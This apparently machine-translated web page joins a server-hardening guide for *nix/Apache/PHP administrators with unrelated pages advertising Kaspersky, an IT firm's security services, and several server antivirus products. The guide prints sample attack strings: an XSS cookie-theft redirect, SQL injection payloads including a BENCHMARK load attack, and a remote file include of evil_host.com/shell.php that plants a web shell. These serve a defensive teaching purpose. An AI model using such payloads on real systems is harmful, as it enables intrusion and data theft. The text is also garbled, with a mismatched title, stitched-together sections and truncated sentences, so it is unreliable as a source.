Deploying anti-virus protection through Kaspersky Security Center. Configuring anti-virus protection Too much time

In this article, I would like to collect some types of attacks on servers and means of protecting the server from hackers. A lot of books and articles have been written on the topic of security. The emphasis of this article is on the basic errors of administrators and solutions to eliminate them. After reading this article and checking his own server, the administrator will also not be able to sleep peacefully, he can only say I passed the "candidate minimum".

Remember administrators three proverbs,
No! better print them out and hang them in your workplace in front of your eyes:
"Security is a process",
"When the admin has nothing to do, he is engaged in security",
"Security is defined by the weakest link"
The article is aimed at *nix + Apache + PHP + Perl + (MySQL | PostgreSQL) admins and protecting servers from remote attacks, for other admins, I hope the article will be food for thought.
Different books have different classifications of hacker attacks, I will introduce my own division into two conditional classes of ALL attacks, ungroup them:

Attack on services that are vulnerable and accessible via the Internet

To understand my division, imagine there is a fictional script that remotely attacks Apache on port 80 and, as a result of the attack, Apache shuts down and you are left without your site, since there is no one to give out web pages. Your sendmail mail server was sent 1000 characters instead of a short username as a parameter to VRFY, sendmail didn't expect this to happen and closed leaving you with no mail. The general meaning of attacks of this conditional class is that some application vulnerability is exploited. And there are three ways -

path1) the application will crash and the service will not be available, DoS situation;
path 2) the application will start to capture resources and, having depleted them, will do a DoS;
path3) the application will be fed a shellcode and the attacker's code will be executed;

These are all attacks on the service (item 1) and they are treated in only one way: the administrator promptly learns from the developer about the presence of a vulnerability and updates this program.

The attack on point 2 is when a dynamic service implemented in some programming language allows receiving parameters and executes them without checking them. For example, using a browser, an attacker, crawling through an Apache site, looks for vulnerabilities in the site itself and exploiting them, gets what he wants. Written in Tcl, the bot for moderating the IRC server channel receives requests from the user (the number of a new joke, the date of the day for displaying the weather) and the hacker, recreating the work of the bot program code (reverse engineering), constructs requests that were not taken into account by the bot author.

Ask how is it? then you definitely need this article. One way or another, just below everything will be painted.

Attack on vulnerable services and the server itself

In this section, I included all attacks whose impact falls on the system and services. Often such attacks are possible from errors in the implementation of the program, such as buffer overflows (buffer overflow). In short, it looks like this, let's say in a poorly written ftp server there is an array (buffer) for a username for a certain number of characters (for example, 10), and such an ftp server receives 100 characters from an ill-wisher, if such a situation is not in the ftp server code checked, a buffer overflow occurs.

So what is a local buffer overflow useful for hackers? It is possible to overwrite the return address with malicious code. Remotely, this allows you to execute arbitrary code on the target system, locally, if the program is running as root, it will allow you to gain system administrator privileges. The code that causes a buffer overflow and performs actions for a hacker is called shell code. Writing shellcode is not an easy task. and requires knowledge of assembly language from the hacker, which implies professionalism in this area.

Protection against attacks on vulnerable services and the server itself

Update. It is necessary to learn how to update the entire system and therefore be able to
"build the world and the kernel" for *nix, update via the Linux package system and be able to click the Update button in Windows Update for licensed MS Windows. FreeBSD admins need to be able to install software using ports. This way you will sail with the developers, not against them.
MS Windows admins need to get used to and use the MSI distribution format more often, which is highly recommended by Microsoft and supports updating the old package with the new one. Whatever you do on your server, ask yourself if there is a new version of this program, how easy is it to update it? You have to create a solution that you have full control over, yes, there are projects with their own developments or patches, but if your developments require freezing the applications you need on a certain version and you cannot apply your patches to the new system - such a solution is NOT worth!

I will make a lyrical digression here and tell you how I had to break myself. After reading articles on the Internet that usually begin like this, "download the source and put it make install". So, what is next? How will you install the new version? Keep the old version so you can make (de|un)install in it? And in the new make install again? These questions were asked by my friend Dmitry Dubrovin when we started learning FreeBSD. I began to understand that he was right, and at least for Free, this path is not suitable, and by not following the path of the FreeBSD developers, I only made things more difficult for myself.

Now, having mastered FreeBSD, when a couple of commands download new sources for the Free kernel and the entire system, then a couple of commands create new world and the kernel, and then the ports and applications in the system are updated, you begin to understand the power of * nix systems. It's hard to convey the pride you feel when you upgrade a server with FreeBSD from an old branch to the current one, rebuild the system's world, when the system compiles itself from new sources (it looks like Munchausen pulled himself by the hair) and everything that worked before the upgrade also works "without file".

As you already understood, you must subscribe to security mailing lists from the developers of the software that supports your business and be updated periodically. Renewal of everything and everything must be perfected and put on rails.
Security tuning. Most server operating systems don't come configured enough, by default, to work in the harsh "chemical" environment of the Internet. In order for hackers to "not cheat" on your server, you need to perform security tuning, namely, read the recommendations of the operating system manufacturer on security. Admins of *nix systems can call man security and, after reading the developers' advice, make the fairy tale come true. But whatever the operating system, you need to carefully test the operation of the server and services after security tuning.
firewall. A configured firewall that you personally checked using nmap port scanners and vulnerability scanners, if there is an output from these programs, do you all understand what is at stake? When setting up a firewall, remember that there are ways to bypass its rules. For example, there is a local area network protected by a firewall, by setting the packet fragmentation prohibition flag, it is possible, in certain situations, to reach the destination in the local area network. Or a common mistake of the administrator, excessive trust in outgoing packets of his own server.
Imagine real situation, the enemy code is trying to initiate a connection to the host hacker's host, and you have a firewall rule "everything is allowed from me to the Internet". When composing firewall rules, you need to fully understand the whole picture of the network communication of your services between themselves and remote clients.
Intrusion detection system. Firewall can be imagined as stone walls near a knight's castle. Erected once and sit inside - dry and comfortable. But what if someone is already testing the strength of the walls from the cannon? Maybe you already need to look out of the castle and pile on someone? To know what is happening behind the walls of the castle, those outside, you need to have an intrusion detection system (IDS) on the server. If you have such a system based on the package you like, then if someone starts firing from the nmap gun, then you will be aware, and the attacker will also be aware of "what you know".
Analysis of non-standard situations. In numerous logs in the system, the inscriptions "error: not open file /etc/passwd" or "access denied" often flash. These are small bells that ring about an incorrectly configured application that cannot read something, somewhere, or maybe it's not a bell, but an alarm sounding the alarm about a hacker who is halfway there.
In any case, the admin should be aware of such things. To facilitate the work of the administrator, programs have been created that will analyze the logs for the appearance of interesting phrases and send a report to the administrator by mail. Do not disdain such an opportunity, such programs are comparable to guards who check on a trusted path, but is everyone behaving as prescribed?
Remove software versions. Remove banners from your services. No, not those banners that you show on your site, but those lines that your programs give out in greetings when connecting or in error output. There is no need to shine with versions of your programs, hackers search the Internet for available programs that exploit this or that vulnerability (exploits - exploit) by versions.
There is no single solution here, for example, if you install a certain program from the ports, then do not write make install clean, so without you everything will be downloaded, compiled and installed. Better do make fetch; make extract; then go to the files subdirectory and there you can correct the version of the program in the sources or pass it off as another one and then only make install clean.

Apache is very informative out of place and still shines with system versions, PHP, Perl, OpenSSL. The disgrace is disabled by specifying directives in httpd.conf ServerSignature Off ServerTokens Prod. On the Internet, you can find help with replacing banners with any program. The goal is the same - to deprive the attacker of valuable information. Looking at your list of services available from the Internet, ask yourself if it gives away too much information about itself and the information it stores.

For example, the DNS server bind can allow "zone transfer" and your computers with their IP and domain names will be available to everyone, which is bad. Check your server with various scanners and carefully read their results. When replacing the program banner, I advise you to insert not random text, but a warning about responsibility and that actions are logged. Since there were incidents when a hacker was released in the courtroom, because on the hacked FTP server there was an inscription "Welcome! Welcome!".
The minimum requirement rule. Minimize available services for the Internet. Disable what you don't need, as you can't hack what's disabled. Common mistake, for example, when the MySQL server, paired with Apache on the same machine, is configured to be accessible remotely on its standard port 3306. Why? Give the command netstat -na | grep LISTEN and give yourself the answer: do you know which programs are using which interface and which port? Are you in control? Well if so.
Many strong and different passwords. Often in videos on hacking or hackers' stories about hacking, the phrase "it's good that the admin had one password for the admin panel, which also went up to ssh and ftp" flashes. I hope this is not about you. Hence the rule: passwords for different services must be different and at least 16 characters long. Let them be written down on a piece of paper if you are afraid to forget (in this place security specialists kill me), but this is better than your password being decrypted in a few minutes by a remote attacker, since the small length of the password and similarity to a dictionary word made it possible.
Different passwords for different services are easy to do if the services will authorize not as system users in the /etc/passwd database, but as virtual ones in their own planar or DBMS databases. Do not store passwords on servers in the password.txt file for all resources to which you, as an admin, have access.
Limitation. All your services on the server must run from different limited accounts (account) and never run from the root account. Believe me, if they get to privilege escalation from a limited account to root status (uid=0, gid=0), you will be saved by the absence of known holes in your updated system.
By the way, many admins forget such a thing, why, for example, accounts for running Apache and MySQL should have access to the shell! After all, this can be disabled and instead of shell specify / bin / false. Well, honestly, check your accounts for programs on your reporting server and tell me if I'm wrong. In your SQL databases, limit accounts to the minimum required privileges. Don't give FILE privileges when only SELECT is called.
Everyone to jail! Learn how to work with sandboxes (sandbox) or prisons (jail) and run applications in these isolated rooms, this will make it difficult to hack the entire server. If you use virtualization, then you can spread services across different guest operating systems.
Layered defense. It is possible to ban something in several ways in different places - do it. NEVER think - I forbade it here, there to prohibit the superfluous.

Learn more about attacks on vulnerable services and the server itself.

DoS attack (Denial of Service) - an attack whose goal is to kill any limited server resource (Internet channel, RAM, processor, etc., etc.) so that the server cannot serve legitimate users. Figuratively speaking, imagine that an intruder called you at home and was silent on the phone, and this went on all evening. You were tired of all this and you turned off the phone, and in the morning you found out that you missed an important call from your boss. Here is an analogy from real life DoS attacks.
In real life, DoS often looks like this, due to a bug in the program, the processor usage jumps and stays at 100% for a long time, and the attacker periodically exploits this hole in the program. A poorly written application can run out of RAM. Or a "mail bomb" in the form of a heavily compressed file in the archive with many characters [space], which will be unpacked for checking by the antivirus and the unpacked huge file will overflow the hard disk partition on the server and / and cause the server to reboot.

DoS Attack Protection:
- Updating a program that is being manipulated for a DoS attack
- Set resource quotas for the account under which this program is running. *nix systems allow you to adjust the percentage of CPU usage, RAM, number of spawned processes, open files, etc. and so on.
- Set up logging in the program and try to find the attacker-puppeteer and block him in the firewall.
- Set up the program as advised by the developer, guru, according to articles on the Internet, if you find yourself in such a situation.
DDoS (the same DoS, but you are attacked from several zombie computers, led by
attacker). DDoS is destructive and they are used only by those vandals who have herds of zombie machines and will demand money to stop the attack or damage your business so that users, without reaching your server, go to a competitor. DDoS attacks are not used by hackers whose goal is to intellectually hack your server, yes, yes, your server is a "mystery" that they want to "solve".
How to protect yourself from DDoS? If you rely on your own strengths and means, then by automating the work of scripts, you can fish out IP addresses from various logs and enter them into the prohibiting firewall rules. So, for example, did the author of the article "Is there life under DDoS" th? many articles on how to configure it to minimize DDoS damage.

Protection against DDoS attacks:
- If DDoS is directed at the application, try to find in the logs the difference between attackers and legitimate users, and by automating with a script, enter it in the firewall rules in deny
- If DDoS is directed at the system (for example, an attack over the ICMP protocol), by automating with a script, add it to the firewall rules in deny
- Set resource quotas for the account under which this program is running. * nix systems allow you to configure the percentage of CPU usage, RAM, the number of spawned processes, open files, etc.
- Set up the program as advised by the developer, guru, according to articles on the Internet, if you find yourself in such a situation
- Contact your upstream provider to help in any way they can. Write a complaint to abuse@host_of_networks_from_the_attack_domain. This will help to partially destroy the attacker's network, let him suffer damage, it costs him money. Experience moral satisfaction.
- Check out mod_security for Apache, it's a great tool to help you in some situations.
Bruteforce password attack. Here the holes in the programs are not to blame, they just roughly select a pair of login / password. Those who left the server with ssh configured, but forgot to restrict access via ssh from certain IPs and with certain logins (directive in ssh_config AllowUser), must have seen in the logs attempts to brute-force the password mash:password_machine.
Bruteforce password protection:
- Limit the number of unsuccessful login/password attempts
- If the application allows, then set up an increase in the time before a new login / password attempt.
- If a narrow circle of people should work with the application, create such a rule and limit it to

Attack through the dynamic content of the service

This type of attack often occurs on a bunch of Apache + (PHP | PERL) + (MySQL | PostgreSQL) for the *nix world and IIS + ASP + Microsoft SQL Server for the MS Windows world using a simple browser, but this is only special case, which is just more commonly used due to the popularity of the web. In this bundle, the programming languages are ASP, PHP, Perl, SQL, so they will often be used by hackers to compile their destructive designs.

BUT the most important thing to understand is that such ligaments service + dynamic content on top of them there are many in programming languages and therefore all of them are under the gun of hackers. For example, here is an incomplete list:

Web server + CGI scripts
An ancient link that is no longer in use - Apache + PHF (namely P H F) scripts
IIS + ColdFusion Application Server
SSI mechanism (Server Side Includes)

Next, we will talk mostly about web hacks, but do not forget that everything described below is true for other service + dynamic content bundles. The words are different, but the essence is the same. Today, hackers attack the web with the browser, tomorrow with the R client against the Z service. The web server, itself connected to databases and numerous programming languages, has become a platform for attacks of this kind.

The meaning of all attacks of this kind is to try to examine the site using a browser to find errors in scripts that serve the dynamic content (content) of the site.

Hence the conclusion - hacking a site through an attack on the web, on which there are only static html pages that only refer to each other, is IMPOSSIBLE. Attacks through your Web site came about when people wanted more interactivity and added it through programming languages and databases.

Hackers surfing the site pay special attention to scripts that are passed any parameter. But what if the script author does not check what exactly is passed as the parameter value?

General solutions for the admin from attacks on the dynamic content of the service (Web site as a special case)

Update. We have already talked about this, but if you use third-party developments (engines of forums, galleries, chats, etc.), then you will receive reports about vulnerabilities and patch holes. The opinion of hackers is that if the portal works with finances and their turnover, then it is not desirable for such a portal to have someone else's developments, except for their own. Of course, it is understood that the development of their own engines for the site was written by coders who know how to program safely and have an understanding of threats on the Internet.
Be non-standard. In many hacker utilities, vulnerability databases, the forum/, gallery/, images/ paths often flash. Very comfortably! Know the admin, half of them will shave and spit on your site when your site is not located at /usr/www, and your admin is not site.com/admin. The bottom line is, if you are not standard, then this is an additional spoke in the wheels of a hacker who attacks your site. He will have to add / correct in the manual database / script. But is a hacker always able or willing to do it? Young hackers "script kiddies" will definitely be scared away. For example, PHP security tips
# Make PHP code look like other types of code
AddType application/x-httpd-php .asp .py .pl
# Make PHP code look like unknown type codes
AddType application/x-httpd-php .bop .foo .133t
# Make PHP code look like html
AddType application/x-httpd-php .html .htm

This form of security for PHP through hiding has few downsides at little cost. The hackers themselves, describing their hacks, write that they download the same software that is located on your server from the developer's site and look at what default table names / paths / this or that engine works with. The general meaning of non-standard is to delay the hacking process so that the hacker does not have a "blitzkrieg", and the more he pulls, the more likely it is to be detected.
Remove versions of engines and scripts on the site. This is valuable information that an attacker should be deprived of knowing the version they are looking for. turnkey solutions for hacking. Make it so that your scripts do not display errors on errors useful information, such as: the path to the script where the error occurred (the "path disclosure" problem) and the output of the error itself.
Consider the need for .htaccess. The presence of .htaccess files means that you can override your options set in the main Apache config, believe me, hackers will do just that. If you disable the use of .htaccess with the "AllowOverride None" directive, then you will get a performance benefit for Apache, since it will not look through all the directories on the path to the web page on each request and increase the security of the Apache web server.

More about attacks on dynamic content (Web site as a special case)

XSS (Cross Site Scripting).
Cross-site scripting is called XSS, not CSS, since CSS is an early acronym for "Cascading Style Sheets". XSS attacks are not directed against the server, but against the users of that server. But the admin does not need to rejoice! An XSS attack looks like this, the site has editable fields on the web page or script parameters that are not filtered by , javascript.
The hacker adds code in the client-side programming language, usually Java and VBScript, to the editable fields, and this code becomes part of the HTML page. When a user visits such a page, their browser parses the page and executes this code.
What do hackers do with XSS?
- Theft of cookies (cookies, buns) - these text files store information that the server "put" to the user for his subsequent identification. In the example, if you create a test.html file with this content (write it yourself), then when run in a browser, it will output XSS.
  Dear admin, I had an error visiting the site
  Help
  But you can write a script in Java and more serious document.location="address of the cookie receiver"+document.cookie. Typically, such scripts are written to the admin's webmail and, using social engineering, try to get him to read the message in order to get his cookies.
  
  If there is no link to the IP address and additional security measures in the cookies, then they replace their cookies with the admin cookies and try to get into the admin panel, which does not check the login and password and identifies people only by cookies.
- Site deface (deface - replacement of the site's start page, most often index.html)
- Trojanization of a remote user. Fresh exploits are selected for users' browsers and when they enter a vulnerable page, an attempt is made to infect the computer with a Trojan. If the user has an antivirus with fresh databases installed, then he will indicate the appearance of a Trojan in the system. And your site will fall in the eyes of the user, perhaps he will not come to you again.
- DoS. With a large number of visitors, the script will additionally request more other pages from your server or from another, someone may have a DoS.
Solution to the problem:
- To block writing html tags to the database from input fields, use constructs like htmlspecialchars for PHP, which will replace< на на >, & to & and so on
  Example,
  $comment = htmlspecialchars($comment, ENT_QUOTES);
  $query = "insert into guestbook
  (name, location, email, url, comment) values
  ("$name", "$location", "$email", "$url", "$comment")";
  mysql_query($query) or die(mysql_error());
- Check and filter in your scripts all the parameters that the user enters and are passed to the script through the address bar. Learn how to properly use regular expressions to parse incoming data. For your programming language, find material that teaches you how to code securely.
- If you would like to use cookie technology on your site, please read our Cookie Security Practices. Limit their actions in time and by IP addresses.
- As an admin, be vigilant when you are being scammed by social engineering. Don't forget about personal computer security behind your client computer.
SQL injection. SQL injection.
This disease means that an unchecked parameter is substituted into the SQL query that appears in the script. The hacker finds scripts suffering from SQL injection in a simple way, the quote site.com/view.php?id=1" is supplied to the parameter value, or the numeric parameter is modified like this site.com/view.php?id=2-1.
If the substituted quote causes an "error" (a lot of messages that such and such a request is not executed in such and such a script along such a path), then such a script is a candidate for pumping it further. Often, attackers use the Google hack, asking the search engine something like this "site: www.victim.ru Warning". The Google search engine will return incorrect scripts on your site, so ancient that they have long been indexed by the Google spider.

Code that does not check the value and suffers from SQL injection
$id = $_REQUEST["id"];
$result = mysql_query("SELECT title, text, datenews, author FROM `news` WHERE `id`="$id"");

Now imagine that instead of a number, you will be substituted "-1 union select null/*" (without quotes) and then your query will turn into
SELECT title, text, datenews, author FROM `news` WHERE `id`="-1 union select null/*"

That is, the hacker wants his request to be executed in addition to your request, combined with yours using the union directive. And then the hacker will try to make other queries and, given the power of the SQL language, this does not bode well for the administrator. From deface (deface - replacing the start page of the site) to obtaining root rights on your server. A hacker can also conduct a DoS attack thanks to SQL injection: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) a couple of such requests and the server is at 100% CPU load for a long time.

SQL Injection Protection:
- Make extensive use of SQL Server features such as views and stored procedures. This will limit unauthorized access to the database.
- Before passing a parameter to the request, it must be checked for type (for PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() and is_integer()) and, at least, quoted using the addslashes type construct for PHP.
- All scripts work with the database from some database account, remove all privileges from this account that are not needed for work. Often hackers use the MySQL command (MySQL is taken as an example, this applies to any SQL server) "LOAD DATA INFILE" to read the files they need from the server and the readable account under which MySQL is running. Hence the conclusion, disable unnecessary privileges for your scripts, such as FILE, which are needed to use the LOAD DATA INFILE command. The principle of "basic minimum" should be taken as a basis.
- The system account under which the SQL server runs should not have access to the pages of the site and the system files of the server.
Connecting files. Include file. Let's say there is a page site.com/getnews.php?file=190607, but the author of the script, using include, connects the page without checks.
$file = $_REQUEST["file"];
include($file.".html");
The hacker will substitute evil_host.com/shell.php instead of 190607 and then the entire address bar of the hacker browser will look like this site.com/postnews.php?file=evil_host.com/shell.php and the hacker will have his own web shell on your site with the rights that Apache has.

File connection protection:
- Check and filter in your scripts all the parameters that the user enters and are passed to the script through the address bar. For your programming language, find material that teaches you how to code securely.
- Hackers really like it when the programming language on the site allows you to run system commands. Therefore, you need to prohibit calling such functions in your programming language, if, of course, this is possible. For example, in the PHP settings it is possible to specify a list of "forbidden" functions using disable_functions in php.ini.
Trojan picture
If you have the ability to upload files to the server on the site, be prepared to upload, for example, avatar pictures. In a picture in JPEG format, there is the concept of metadata (remember where the camera writes information when shooting a frame) and this metadata will be written

the image will be renamed avatara.jpg.php to bypass most extension checks and will use site.com/upload_images/avatara.jpg.php?cmd=server_commands

Trojan protection:
- Check the file extension correctly. Even if you process allowed files correctly, be prepared for the image from jpg to php to be renamed using another vulnerability on your site. Check for metadata in an image with functions like exif_read_data() in PHP.
- Prevent the execution of programming languages in image directories by means of your web server. To do this, look in the Apache config lines like "AddType application/x-httpd-", which associate programming languages with file extensions and prohibit their execution in directories with images. For Apache, prohibiting the execution of PHP language files will be a construct
  
  Order deny, allow
  Deny from all
- For your programming language, find material that teaches you how to code securely when processing images and correctly uploading them to the server.

Personal thanks:

friend Alexander Pupyshev aka lynx for criticism and advice
site antichat.ru/
www.xakep.ru/
book by Michael Eben, Brian Taiman. FreeBSD Administration: The Art of Balancing
book by Joel Scambray, Stuart McClure, George Kurtz. Secrets of hackers: Network security - ready-made solutions. Second Edition

Other sources of protection information:

The FreeBSD man security man page contains a description of common security issues and good administration practices.
Subscribe to the freebsd-security @ freebsd.org mailing lists. To do this, send an email to majordomo @ freebsd.org with subscribe freebsd-security in the body of the message. It is on this mailing list that the most discussed actual problems protection.
FreeBSD security information page freebsd.org/security/
FreeBSD Security How-To Document
The CERT.org website contains information about vulnerabilities ah in the protection of all operating systems.
Firewalls & Internet Security by William R. Cheswick and Steven M. Bellowin
Building Internet Firewalls, 2nd Edition by Brent Chapman and Elizabeth Zwicky

Outcome:
I hope the article helped you see all the problems together, now the admin needs to read about computer security, databases, web servers, programming languages from additional sources. Summarizing the article briefly, you need to be aware of the news about the release of security problems, update and check all input data for correctness in your developments.
May the force be with you!

In order for the company's software services to work successfully without failures, you need high-quality installation, as well as setting up anti-virus protection. Today, no company can do without the use of the Internet for accounting, business correspondence, reporting. The CRM system is very popular, but the quality of its work directly depends on the connection to the global network.

Benefits of Installing Virus Software

Antivirus products provide different levels of protection. Programs help prevent problems such as:

theft of information through remote access to the server, including of a confidential nature (for example, data for accessing company accounts);
introduction of various client applications into the operating system to perform DDoS attacks;
failure of the company's equipment due to the harmful effects of various programs;
blocking, damage to programs and servers necessary for operation;
theft, falsification or destruction of confidential data.

To summarize, there will be only one conclusion - the introduction of an anti-virus database will help the company avoid large financial losses. Moreover, this applies not only to preventing possible server hacking, but also to maintaining the functionality of equipment and paid online systems. That is why the issue of setting up high-quality and effective protection is always relevant for businesses of all sizes.

The most popular software for installation in the office

Most often, customers prefer setting up different versions of Kaspersky antivirus. The popularity of this software product is due to the following characteristics:

a large number of options for both small, medium and large businesses, a separate line for home use;
Kaspersky software packages are designed for installation not only on office servers, but also on mobile phones, laptops;
servers of joint work, mail, various files are reliably protected by an anti-virus product;
Kaspersky Anti-Virus counteracts attacks on Internet gateways;
product configuration eliminates the internal threat of a server attack, since it implies the differentiation of user rights.

Among other advantages of installing the specified anti-virus system are data backup, storing passwords and auto-completing Internet forms in a safe mode, preventing spam and phishing from entering servers. In addition, the price of protection by these products is very favorable. For users who are little versed in the intricacies of programming, the developers of Kaspersky Anti-Virus have created a convenient, simple and understandable interface.

What to look for when choosing security software?

which servers the specific software is designed to protect: home, small and medium-sized businesses, large companies;
breadth of coverage by the proposed programs of local business servers;
continuity of work, frequency and conditions of updating;
the possibility of centralized management of the anti-virus system;
compatibility of the proposed product with installed business programs and other software.

An important point is also the choice of a company that implements such products. A qualified employee in the shortest possible time will set up the correct work and instruct clients on how to use the program tools when working with servers. The cost of providing such services plays an important role - in our company it is always very profitable.

It is impossible to protect the server from external access once and for all, because every day new vulnerabilities are discovered and new ways of hacking the server appear. We will talk about protecting servers from unauthorized access in this article.

The servers of any company can sooner or later become a target for hacking or a virus attack. Typically, the result of such an attack is data loss, reputational or financial damage, so server security issues should be addressed in the first place.

It should be understood that protection against server hacking is a set of measures, including those that imply constant monitoring of server operation and work to improve protection. It is impossible to protect the server from external access once and for all, because every day new vulnerabilities are discovered and new ways of hacking the server appear.

We will talk about protecting servers from unauthorized access in this article.

Ways and methods of protecting servers from unauthorized access Physical protection of the server

Physical protection. It is desirable that the server be located in a secure data center, a closed and guarded room, outsiders should not have access to the server.

Set up SSH authentication

When setting up access to the server, use SSH key authentication instead of a password, since such keys are much more difficult, and sometimes simply impossible to crack using a brute-force search.

If you think that you still need a password, be sure to limit the number of attempts to enter it.

Pay attention if you see a message like this when you log in:

Last failed login: Tue Sep 28 12:42:35 MSK 2017 from 52.15.194.10 on ssh:notty
There were 8243 failed login attempts since the last successful login.

It may indicate that your server has been hacked. In this case, to configure server security, change the SSH port, limit the list of IPs from which access to the server is possible, or install software that automatically blocks excessively frequent and suspicious activity.

Install the latest updates regularly

To ensure server protection, install the latest patches and updates of the server software you use - operating system, hypervisor, database server on time.

It is advisable to check for new patches, updates, and reported bugs/vulnerabilities every day to prevent attacks exploiting zero-day vulnerabilities. To do this, subscribe to news from the software development company, follow its pages on social networks.

Protect passwords

By far one of the most common ways to gain access to a server is to crack the server's password. Therefore, follow the well-known, but nevertheless relevant recommendations in order not to leave the server unprotected:

do not use passwords that are easy to guess, such as the name of the company;
if you are still using the default password for the admin console, change it immediately;
passwords for different services must be different;
if you need to share your password with someone, never send your IP address, username and password in the same email or messenger message;
You can set up 2-Step Verification to log in to the administrator account.

firewall

Make sure the server has , is configured, and is running all the time.
Protect both incoming and outgoing traffic.
Keep track of what ports are open and for what purpose, do not open anything unnecessary to reduce the number of possible vulnerabilities for server hacking.

In particular, the firewall is very helpful in protecting the server from ddos attacks, because you can quickly create blocking firewall rules and add IP addresses from which the attack is coming from, or block access to certain applications using certain protocols.

Monitoring and intrusion detection

Limit the software and services running on your server. Periodically check everything that you have running, and if any unfamiliar processes are found, delete them immediately and start checking for viruses.
Periodically check for signs of tampering. A hack may be evidenced by new user accounts that you did not create, moving or deleting a file /etc/syslog.conf, deleted files /etc/shadow And /etc/passwrd .
Monitor your server, keep an eye on its normal speed and throughput, so you can notice deviations, for example, when the load on the server has become much more than usual.

Using VPN and SSL/TLS Encryption

If remote access to the server is required, it must be allowed only from certain IP addresses and take place over the VPN.

The next step in ensuring security can be setting up SSL, which will not only encrypt data, but also verify the identity of other participants in the network infrastructure by issuing appropriate certificates to them.

Server security check

It would be a good idea to independently check the security of the server using the pentest method, i.e. attack simulation to find potential vulnerabilities and eliminate them in time. It is advisable to involve specialists in this information security, however, some tests can be done independently using server hacking programs.

What else threatens servers besides hacking

A server can go down for a number of reasons other than being hacked. For example, it could be a malware infection or just a physical failure of one of the components.

Therefore, measures to protect the server should include:

Installing and updating programs to protect the server - antiviruses.
Regular encrypted copies of data at least once a week, because, according to statistics, server hard drives are in the first place in terms of the frequency of breakdowns. Make sure the backup is stored in a physically secure environment.
Ensuring uninterrupted power supply to the server room.
Timely physical prevention of servers, including cleaning them from dust and replacing thermal paste.

The experience of Integrus specialists tells us that the best protection against such threats is the application of the best practices in the field of server protection systems.

To ensure the security of our customers' servers, we use a combination of tools: firewalls, antiviruses, security / event management technologies (SIM / SEM), intrusion detection / protection technologies (IDS / IPS), network behavioral analysis (NBA) technologies, of course regular preventive maintenance servers and arrangement of secure server rooms on a turnkey basis. This allows you to minimize the risks of hacking or server failure for other reasons.

We are ready to conduct a security audit of your company's servers, consult specialists, perform all types of work on setting up the protection of server equipment.

A server is a specialized computer, the actions on which occur without the active participation of the user. Usually there is a service software to carry out certain tasks. Through such a computer, data is exchanged, actions are launched, mathematical calculations are performed, and much more. All servers differ in types, for example, there are gaming, web, mail and proxy servers. Each such device performs a clearly defined task. Often, for the safe operation of such a machine, an antivirus is installed on it, so we would like to tell you more about such software, highlighting a few specific solutions.

Platform: Windows Server

The well-known antivirus company Avast releases an assembly specifically for servers, providing additional useful tools. For example, take a look at the function "Data Destruction". It is implemented in such a way that it overwrites randomly generated information in all deleted data, which will not allow recreating the original state of the file when trying to restore it. In addition, there is "Behavior Analysis"- a tool responsible for scanning work applications for suspicious activity. If notepad tries to access the same webcam, such a request will be blocked immediately. Of course, such an example is simple, but the function works at a higher level.

Avast Business Antivirus Pro also has a built-in firewall, smart scanning, spam protection, password protection, and easier account login. There is also a constant comparison of probable threats with the current virus database using the Software defender technology. It will allow you to interact only with verified data. In turn, the CyberCapture tool will send suspicious objects to the Threat Lab.

Avira Antivirus Server

Platform: Windows Server

Avira Antivirus Server is a special solution from the developer company for servers running the Windows operating system. The creators promise the maximum efficient work with low system resource consumption, high threat detection rate and ease of use. The assembly has added tools for protection on access, that is, it monitors running processes when they are accessed by other applications. There is also manual scanning, which allows you to start the analysis of the specified media or a separate directory at any time.

Once again, we note that the developer places particular emphasis on low consumption of PC resources and ease of antivirus management. Constant free innovations and virus database updates are also promised. If you are interested in getting acquainted with this product, you can get a free version for a 30-day period on the official website by filling out the appropriate form. During testing, all tools and functions will be available, as well as a free contact with the support service.

ESET File Security

ESET File Security is designed to run on Windows and Linux servers, and provides multi-layered protection thanks to the additional ESET Dynamic Threat Defense cloud sandbox component. The cloud-based protection system automatically protects against new threats without waiting for a detection engine update (the specified average update time is 20 minutes). Built-in network attack protection recognizes known vulnerabilities at the network level, and when using OneDrive, the Office 365 OneDrive Storage engine will scan it. Attention should also be paid to preventing the influence of botnets. The tool not only finds a malicious connection, but also detects the same processes, immediately blocking dangerous activity and notifying the user about it.

To manage ESET File Security, the user is prompted to install the console on Windows or Linux, and there is a virtual import device to simplify setup. You can get acquainted with all the functionality of this antivirus, try its free version and buy the full one on the official website of the developers.

kaspersky security

Platform: Windows Server, Linux

Kaspersky Security for Servers is included in assemblies - Total, Endpoint Security for Business, Kaspersky Security for Virtual and Cloud Environments, and Kaspersky Security for Storage Systems. By purchasing one of these versions, you get reliable protection for your server from newest generation malware. The software in question has advanced server protection and provides protection against exploits, protection of terminal servers, monitors external traffic, system integrity and continuously protects data storage systems using a multi-level tool. Built-in administrator rights management systems provide ease of management, notifications, as well as integration with SIEM systems and Windows firewall management.

I would like to note that Kaspersky Security has separate system requirements for specific storage platforms, for example, for NetApp - Clustered Data ONTAP 8.x and 9.x and Data ONTAP 7.x and 8.x in 7-mode mode, and for EMC Isilon - IBM System Storage N series. You can get acquainted with the list of all requirements when downloading the antivirus on the Kaspersky website.

McAfee VirusScan Enterprise

Platform: Windows Server, Linux

Previously, users installed McAfee Endpoint Security on their servers, but the developers decided to improve this product with a further change in its name. Now it's VirusScan Enterprise. Anyone who has previously used this antivirus is offered a free migration. The official website provides all the necessary instructions and lessons on this issue. to the basic toolkit new version includes: firewall, web controls for threat communication, mandatory antivirus, and exploit prevention options.

McAfee VirusScan Enterprise uses and modern methods machine learning. Such technologies make it possible to detect malicious code through static and behavioral attributes. Malware is contained as soon as it enters the system, preventing it from infecting other processes. Endpoint Detection and Tesponse technology is responsible for endpoint detection and response - this will allow you to respond to threats with one click.

Comodo Antivirus for Linux

Platform: Linux

The developers of Comodo Antivirus have presented a separate version for operating systems based on the Linux kernel. This program is supported by most distributions, both 32-bit and 64-bit. Of the features, I would like to immediately note the mail filter, which is compatible with popular mail agents: Postfix, Qmail, Sendmail and Exim MTA. The manufacturer guarantees reliable real-time protection, ease of installation and no complicated configuration steps. The anti-spam system can be completely edited manually, but the standard settings will provide good filtration. If the user wants to get even more control over files, a function is available to enable "Real-time Behavior Analysis". All suspicious objects will be sent to the cloud behavior analysis server.

